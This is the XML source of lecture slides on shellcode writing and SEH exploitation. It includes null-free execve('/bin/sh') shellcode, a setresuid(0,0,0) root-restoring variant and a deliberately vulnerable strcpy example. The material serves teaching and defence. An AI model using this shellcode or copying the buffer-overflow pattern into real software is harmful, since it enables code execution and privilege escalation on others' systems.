            <a:ext cx="887625" cy="1037106"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="93433" w="35505">
                <a:moveTo>
                  <a:pt x="748" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20182" y="11959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17566" y="48585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35505" y="51948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21303" y="59423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22424" y="90443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9343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8" name="Shape 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6595730" y="3544103"/>
            <a:ext cx="887625" cy="1037106"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="93433" w="35505">
                <a:moveTo>
                  <a:pt x="748" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20182" y="11959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17566" y="48585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35505" y="51948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21303" y="59423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22424" y="90443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9343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9" name="Shape 279"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5515331" y="4540519"/>
            <a:ext cx="999600" cy="34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AH (8bits)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Shape 280"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6582131" y="4540519"/>
            <a:ext cx="999600" cy="345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 (8bits)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26225" y="3092650"/>
            <a:ext cx="1672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Nothing.....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accessed with a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>bitshift...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847375" y="5026700"/>
            <a:ext cx="51015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Alternative view (with 64 bit):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|63..32|31..16|15-8|7-0|</a:t>
            </a:r>
            <a:b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|AH.|AL.|</a:t>
            </a:r>
            <a:b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|AX.....|</a:t>
            </a:r>
            <a:b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|EAX............|</a:t>
            </a:r>
            <a:b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|RAX...................|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on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"\xbb\x00\x00\x00\x00"    mov ebx, 0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"\xb8\x01\x00\x00\x00"    mov eax,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"\xcd\x80";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Creatively rewriting each one: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ebx, 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>			is equivalent to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xor ebx, ebx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and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eax, 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>			is equivalent to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mov	al, 1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9" name="Shape 289"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6701250" y="4625000"/>
            <a:ext cx="37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5570700" y="5148150"/>
            <a:ext cx="24294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AL and AH style registers are 16 bits each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assembly code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		.text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global	_start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_start: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xor 	ebx,ebx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mov	al,1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int	0x80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second note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To get an understanding of the history of exploitation and executable security, read this brief blog post:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3000"/>
            </a:b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http://www.abysssec.com/blog/tag/safeseh/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Yay!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 more NULL opcodes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the shellcode is smaller!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always a good thing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75" y="1704688"/>
            <a:ext cx="58864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Steps for writing shellcode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Use a high-level language to write the desired shellcode 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Compile and disassemble the high level shellcode program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Analyze how the program works at the assembly level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Clean up the assembly to compact it, and make it injectable (no nulls)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Extract opcodes and create the shellcode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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>(starting from a basis)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//exec_shell.c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&lt;unistd.h&gt;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fname[] = "/bin/sh\x00";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**arg, **envp; //Arrays that contain char pointers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arg[0] = fname; //The only argument to execve is the filename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arg[1] = 0; //Null terminate the arg array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envp[0] = 0; //No need to pass on environmental args, so null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execve(fname, arg, envp);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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>(starting from a basis)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//exec_shell.c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&lt;unistd.h&gt;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fname[] = "/bin/sh";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**arg, **envp;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arg[0] = fname;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arg[1] = 0;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envp[0] = 0;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execve(fname, arg, envp);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606250" y="2139625"/>
            <a:ext cx="40551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/>
              <a:t>We need position-independent, *injectable*,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400"/>
              <a:t>shell-spawning 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 this in assembly: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need to build in memory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argument array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environment array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these two are NULL terminated, so cannot build them statically (\x00 = bad!)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 string in the high level code is going to be null terminated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have to deal with this!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="323" name="Shape 323"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="321" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4572000" y="1704688"/>
            <a:ext cx="3300" cy="489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execve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590675"/>
            <a:ext cx="88582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execve()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 sz="2400"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>() takes three arguments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2400"/>
              <a:t>must all be pointers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 sz="2400"/>
              <a:t>pointer to a string that is the name of the binary to execute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 sz="2400"/>
              <a:t>pointer to the arguments array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in most shellcode cases, is the name of the program to be executed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 sz="2400"/>
              <a:t>pointer to the environment array (can be left as NULL)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 u="sng"/>
              <a:t>When passing pointers / addresses, there are two ways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2400"/>
              <a:t>hardcoded addresses = makes fragile shellcode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 sz="2400" u="sng"/>
              <a:t>relative addressing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>  =</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>position-independent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" u="sng"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>shellcode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These pointers are moved in the registers by execve()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0x80 (for execve)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EAX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>will hold the integer # to address the execve system call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EBX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>will hold the addr for "/bin/sh"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ECX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>will hold a NULL terminated array of arguments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we only need one argument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program name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EDX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>will hold a NULL terminated environment array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Not necessary, so set NULL at element #0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Compile with -static option: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gcc -masm=intel -static -o exec_shell exec_shell.c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objdump -M intel -d exec_shell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/>
              <a:t>again to get the opcodes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/>
              <a:t>However, the output this time will be huge...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i="1" lang="en"/>
              <a:t>To save time, we're just going to extract the relevant data for the slides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76200" y="1704688"/>
            <a:ext cx="56322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08048224 &lt;main&gt;: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8048224:  55                      push   ebp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8048225:  89 e5                   mov    ebp,esp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8048227:  83 ec 38                sub    esp,0x38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804822a:  83 e4 f0                and    esp,0xfffffff0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804822d:  b8 00 00 00 00          mov    eax,0x0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8048232:  29 c4                   sub    esp,eax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8048234:  a1 c8 de 09 08          mov    eax,ds:0x809dec8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8048239:  89 45 e8                mov    DWORD PTR [ebp-24],eax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804823c:  a1 cc de 09 08          mov    eax,ds:0x809decc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8048241:  89 45 ec                mov    DWORD PTR [ebp-20],eax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8048244:  0f b6 05 d0 de 09 08    movzx  eax,BYTE PTR ds:0x809ded0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804824b:  88 45 f0                mov    BYTE PTR [ebp-16],al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804824e:  8b 55 e4                mov    edx,DWORD PTR [ebp-28]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8048251:  8d 45 e8                lea    eax,[ebp-24]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8048254:  89 02                   mov    DWORD PTR [edx],eax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8048256:  8b 45 e4                mov    eax,DWORD PTR [ebp-28]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8048259:  83 c0 04                add    eax,0x4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804825c:  c7 00 00 00 00 00       mov    DWORD PTR [eax],0x0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8048262:  8b 45 e0                mov    eax,DWORD PTR [ebp-32]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8048265:  c7 00 00 00 00 00       mov    DWORD PTR [eax],0x0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804826b:  8b 45 e0                mov    eax,DWORD PTR [ebp-32]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804826e:  89 44 24 08             mov    DWORD PTR [esp+8],eax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8048272:  8b 45 e4                mov    eax,DWORD PTR [ebp-28]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8048275:  89 44 24 04             mov    DWORD PTR [esp+4],eax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8048279:  8d 45 e8                lea    eax,[ebp-24]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804827c:  89 04 24               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    DWORD PTR [esp],eax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804827f:  e8 dc 59 00 00          call   804dc60 &lt;__execve&gt;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8048284:  c9                      leave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8048285:  c3                      ret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631700" y="1628488"/>
            <a:ext cx="46602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0804dc60 &lt;__execve&gt;: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804dc60:  55                      push   ebp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804dc61:  89 e5                   mov    ebp,esp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804dc63:  8b 4d 0c                mov    ecx,DWORD PTR [ebp+12]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804dc66:  53                      push   ebx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804dc67:  8b 55 10                mov    edx,DWORD PTR [ebp+16]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804dc6a:  8b 5d 08                mov    ebx,DWORD PTR [ebp+8]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804dc6d:  b8 0b 00 00 00          mov    eax,0xb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804dc72:  cd 80                   int    0x80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804dc74:  89 c1                   mov    ecx,eax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804dc76:  81 f9 00 f0 ff ff       cmp    ecx,0xfffff000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804dc7c:  77 03                   ja     804dc81 &lt;__execve+0x21&gt;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804dc7e:  5b                      pop    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804dc7f:  5d                      pop    ebp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804dc80:  c3                      ret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804dc81:  b8 e8 ff ff ff          mov    eax,0xffffffe8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804dc86:  f7 d9                   neg    ecx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804dc88:  65 8b 15 00 00 00 00    mov    edx,DWORD PTR gs:0x0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804dc8f:  89 0c 02                mov    DWORD PTR [edx+eax],ecx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804dc92:  b8 ff ff ff ff          mov    eax,0xffffffff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804dc97:  eb e5                   jmp    804dc7e &lt;__execve+0x1e&gt;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804dc99:  90                      nop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804dc9a:  90                      nop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4662325" y="5222925"/>
            <a:ext cx="36906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This can be intimidating to look at, but we can use it to help us understand what to do!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 Constructing execve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EAX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>will hold 11  (0x0b) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>for the syscall #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EBX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>will hold the addr for "/bin/sh"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 is going to have to be null terminated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We can put it at the end of the shellcode, and not have to worry about terminating it in-memory!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ECX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>will hold a NULL terminated array of arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>we only need one argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>the program name </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>we can bitshift the "/bin/sh" string down to just "sh" with assembly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EDX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>will hold a NULL </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>terminated environment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Corrections from last time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When I was using gdb, I forgot to set the assembly-flavor to intel syntax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GDB defaults to AT&amp;T syntax :(   (sorry for any confusion)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When I was hunting for the RET value on the stack, I should have searched starting with EBP instead of ESP.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(my bad due to lack of sleep)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134125" y="2829400"/>
            <a:ext cx="32322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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local function variables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Stack data (saved registers, etc..)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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saved EBP (frame pointer)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RET address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function arguments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4253450" y="3297825"/>
            <a:ext cx="8712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endCxn id="113" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3991125" y="4501750"/>
            <a:ext cx="1143000" cy="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3475850" y="3044875"/>
            <a:ext cx="7965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ESP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75850" y="4416475"/>
            <a:ext cx="7965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5|-|3|_|_(0])3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4760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jmp short part_two	;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>this is a call trick to get the string pointer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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;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part_one: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; int execve(const char fname, char *const argv[], char *const envp[] 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pop ebx				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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EBX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>has the addr of our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xor eax, eax		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;Put 0 into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[ebx+7], al	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>replace the 'X' in the string with 8 bits of zero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[ebx+8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], ebx	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;Put addr from EBX where the '1337'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[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ebx+12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], eax	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;Put 32-bit null terminator where the 'B055'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lea ecx, [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ebx+8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lang="en"/>
              <a:t>;Load the addr of [ebx+8] into ecx (argv ptr)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lea edx, [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ebx+12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lang="en"/>
              <a:t>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EDX =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EBX+12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(the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> env ptr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eax, 11			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;Put 11 into the EAX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0x80	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;launch the exploit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part_two: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call part_one		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db '/bin/shX1337B055'	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into null bytes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7575"/>
            <a:ext cx="75628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NASM note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you just run, it generates a raw binary, without ELF headers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super useful for getting the finished product of shellcode, that doesn't require any objects / shared objects / etc..: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however we cannot debug this with objdump now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88" y="3448863"/>
            <a:ext cx="75914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8" y="2052000"/>
            <a:ext cx="39338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388" y="5284175"/>
            <a:ext cx="47529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NASM note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compile shellcode into a format you can debug with objdump, you'll have to give objdump an object file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the man nasm page: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So... compile the shellcode with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nasm -f elf</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>, and link it with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i="1"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04688"/>
            <a:ext cx="47529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00" y="3089125"/>
            <a:ext cx="7124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600" y="4426675"/>
            <a:ext cx="73342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34663"/>
            <a:ext cx="7210425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1223970" y="3522425"/>
            <a:ext cx="2775006" cy="420444"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal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541375" y="3838650"/>
            <a:ext cx="4456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EAX is a 32 bit register, so 0xb gets expanded!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to 0x0000000b  (little endian = \x0b \x00 \x00 \x00)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5|-|3|_|_(0])3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14760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jmp short part_two	;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>this is a call trick to get the string pointer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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;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part_one: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; int execve(const char fname, char *const argv[], char *const envp[] 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pop ebx				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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EBX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>has the addr of our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xor eax, eax		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;Put 0 into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[ebx+7], al	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;Null terminate the /bin/sh string (replace the 'X' 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[ebx+8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], ebx	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;Put addr from EBX where the '1337'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 [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ebx+12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], eax	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;Put 32-bit null terminator where the 'B055'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lea ecx, [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ebx+8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lang="en"/>
              <a:t>;Load the addr of [ebx+8] into ecx (argv ptr)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lea edx, [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ebx+12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lang="en"/>
              <a:t>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EDX =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EBX+12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(the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> env ptr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mov al, 11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/>
              <a:t>;Put 11 into the EAX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>(this is a AL trick to avoid NULLs)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0x80	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;launch the exploit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part_two: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call part_one		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db '/bin/shX1337B055'	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NULL BYTES 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547813"/>
            <a:ext cx="75914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Position independent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export SHELLCODE=$(cat spawnshell)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5" y="2420801"/>
            <a:ext cx="70961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339050"/>
            <a:ext cx="76009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system call args go in the registers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nasm usage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nasm &lt;file&gt;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nasm -f elf &lt;file&gt;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Call trick to put the "/bin/sh....." string at the end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makes terminating those strings easier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edit the string to replace certain characters (i.e. 'X' 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Creative, and technical ways to remove null characters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953" y="3848087"/>
            <a:ext cx="3156093" cy="26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27" y="268427"/>
            <a:ext cx="6321147" cy="632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interesting news...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http://www.nytimes.com/2013/01/31/technology/chinese-hackers-infiltrate-new-york-times-computers.html?hp&amp;_r=1&amp;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Privileges!  (for the low price of $13.37)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common mitigation of privilege escalation is that some privilege processes will lower their privileges (while doing normal things)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seteuid()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Example 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&lt;unistd.h&gt;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lowered_privilege_function(unsigned char *ptr)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buffer[50];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seteuid(5);  // Drop privileges to the player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strcpy(buffer,ptr);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main(int argc, char *argv[]){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(argc &gt;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lowered_privilege_function(argv[1]);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40" name="Shape 440"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506150" y="30327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Privileges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Nothing prevents the attacker from crafting shellcode that calls the setresuid() system call!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#define __NR_setresuid			164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#define __NR_setresuid32		208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7" name="Shape 447"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506150" y="24993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48" name="Shape 448"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506150" y="3108975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Example!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 setresuid(uid_t ruid, uid_t euid, uid_t suid);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xor eax, eax      ; zero out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xor ebx, ebx      ; zero out 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xor ecx, ecx      ; zero out ecx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xor edx, edx      ; zero out edx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mov al,  0xa4     ; 164 (0xa4) for syscall #164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int 0x80          ; setresuid(0, 0, 0)  restore all root privs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xor eax, eax      ; make sure eax is zeroed again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mov al, 11        ; syscall #11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push ecx          ; push some nulls for string termination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push ecx          ; push 32-bit null terminator to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reference slides for shellcodes &amp; registers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Shape 460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64 bit Architecture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Registers: RAX RBX RCX RDX RBP RSP RSI RDI </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r8 r9 r10 r11 r12 r13 r14 r15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Similar to 32, but the GPRs have been expanded to 64bits and renamed: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EAX is now RAX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EBX is now RBX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so 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Twice the amount of GPRs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Shellcode (32 &amp; 64bit)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Not like linux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kernel interface is accessed by loading the address of the Win32API DLLs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DLL address will vary for EACH version of windows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DLL addresses can be found at runtime or can be hardcoded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kernel32.dll has functions to do this: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LoadLibrary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GetProcAddress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b="1" lang="en"/>
              <a:t>We'll cover next time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78" name="Shape 478"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496644" y="3688822"/>
            <a:ext cx="6621600" cy="83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vs Windows process memory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04688"/>
            <a:ext cx="5956592" cy="48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6410750" y="5764700"/>
            <a:ext cx="22113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4"/>
              </a:rPr>
              <a:t>http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory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4798125" y="1657350"/>
            <a:ext cx="2410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Higher Memory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Win32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5" y="1668125"/>
            <a:ext cx="5400675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5578325" y="1744325"/>
            <a:ext cx="30813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grows towards lower memory (on all systems)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 &amp; Heap are adjacent, and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>grow apart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https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/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491125" y="6477825"/>
            <a:ext cx="20376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Higher memory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SEH Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Shape 501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 POP RET....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XOR POP POP RET...</a:t>
            </a:r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54" y="4396659"/>
            <a:ext cx="5120497" cy="225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482392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Foundations of writing Shellcode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 is it written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examples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Linux vs Windows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 it is used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position independent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Win32 Process memory Map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How it differs from linux process memory map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Heap sprays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because you need to know about non-stack exploits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SEH Exploitation (POP POP RET)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Executable Security Mechanisms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Stack cookies, ASLR, DEP/NX, Safe SEH, SEHOP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ways to bypass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Structured Exception Handling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try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 catch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SEH is code written in an application for handling exceptions.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Exceptions are special events that interrupt "normal" process behavior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Each exception handler when compiled is mapped into the stack in 8 Bytes, divided by 2 pointers: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Pointer to the next "exception registration" struct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 sz="2400"/>
              <a:t>this pointer is used if the current handler is not able to catch the given exception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pointer to the actual code for handling the exception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/ C++ exception types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SEH exceptions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>(AKA Win32 or system exceptions)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> These are the only exceptions available to C programs.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compiler supports with __try, __except, __finally ... etc...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C++ exceptions </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>(aka "EH")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implemented on top of SEH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allow throwing and catching of arbitrary types of events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Microsoft Visual C++ compiler implements this in a complex way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2400"/>
              <a:t>automatic stack unwinding during exception processing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2400"/>
              <a:t>lots of checks / flags to ensure it works properly in all cases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3344"/>
            <a:ext cx="8245393" cy="644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SEH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Windows has a default SEH handler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You've all seen it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message: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“xxx has encountered a problem and needs to close” popup.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-3810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SEH Exploits make up about 20% of the metasploit framework (estimated back in 2009)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Simplified abstract view of stack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2176088"/>
            <a:ext cx="7289800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view of stack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457200" y="1704688"/>
            <a:ext cx="40998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NORMAL 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Local function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 data (saved registers, etc..)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saved EBP (frame pointer)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RET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function arguments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572000" y="1704688"/>
            <a:ext cx="40998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YOUR STACK ON SEH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Nested Functions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--------------------------------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Saved Registers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Local function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saved ESP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Exception pointer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SEH records [8 bytes each]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SEH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Scope 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Saved EBP (frame pointer)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RET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function arguments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241876"/>
            <a:ext cx="3473568" cy="2303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Shape 544"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4183275" y="1670325"/>
            <a:ext cx="0" cy="525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545" name="Shape 545"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="435193">
            <a:off x="4064189" y="1191003"/>
            <a:ext cx="3930196" cy="1339826"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2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SEH record components on stack (simplified view)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79" y="1412530"/>
            <a:ext cx="6530129" cy="469116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466525" y="6099900"/>
            <a:ext cx="8222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https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Shape 554"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300150" y="1597872"/>
            <a:ext cx="605394" cy="1975050"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal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7225225" y="2163600"/>
            <a:ext cx="893225" cy="3255300"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="130212" w="35729">
                <a:moveTo>
                  <a:pt x="6748" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="24613" y="19055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25804" y="59151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35729" y="71458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28980" y="82574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26995" y="120288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="130212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56" name="Shape 556"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8032325" y="3496700"/>
            <a:ext cx="913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points to code in the .text segment ususally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SEH location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(MS Visual C++ SEH3)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457200" y="1704688"/>
            <a:ext cx="33189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Stack layout without buffer overrun protection for SEH frames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details here can vary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http://www.openrce.org/articles/full_view/21</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="563" name="Shape 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100" y="1743538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SEH location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MSVC-SEH4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457200" y="1704688"/>
            <a:ext cx="33189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Stack layout with </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>buffer overrun protection for SEH frames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GS cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> present when function is compiled with /GS switch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EH cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is always present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not interesting!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details here can vary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http://www.openrce.org/articles/full_view/21</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="570" name="Shape 5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489" y="1198289"/>
            <a:ext cx="4688111" cy="539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457200" y="1704688"/>
            <a:ext cx="31779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a process is created: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pointer at the top of the SEH chain is placed at the top of the main data block of the process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When exceptions occur </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>ntdll.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> retrieves the head of the SEH chain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then iterates down the SEH record chains to find a suitable handler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default handler:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr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100" y="1743538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538" y="5403968"/>
            <a:ext cx="2439387" cy="1140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$|-|3|_|_(0])3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(Because I don't train script kiddies)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-Main Sources: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 Shellcoder's Handbook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Hacking: The Art of Exploitation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note: faultrep.dll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Once SEH kicks in and the default execption handler is invoked,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faultrep.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is loaded and performs the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ReportFault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function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user-mode dll   (also a target for attackers)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Provides [Send Error Report]</a:t>
            </a:r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45" y="2977421"/>
            <a:ext cx="8346606" cy="3675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6" name="Shape 586"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3433950" y="2858325"/>
            <a:ext cx="2650200" cy="3116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Stack changes after jumping to the exception dispatcher</a:t>
            </a:r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Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Shape 593"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572700" y="2461341"/>
            <a:ext cx="2114100" cy="2292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ESP RET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Establisher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Context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 Context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6351850" y="1846000"/>
            <a:ext cx="2302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Exception Dispatcher's Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595" name="Shape 595"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="2123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</p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="596" name="Shape 596"/>
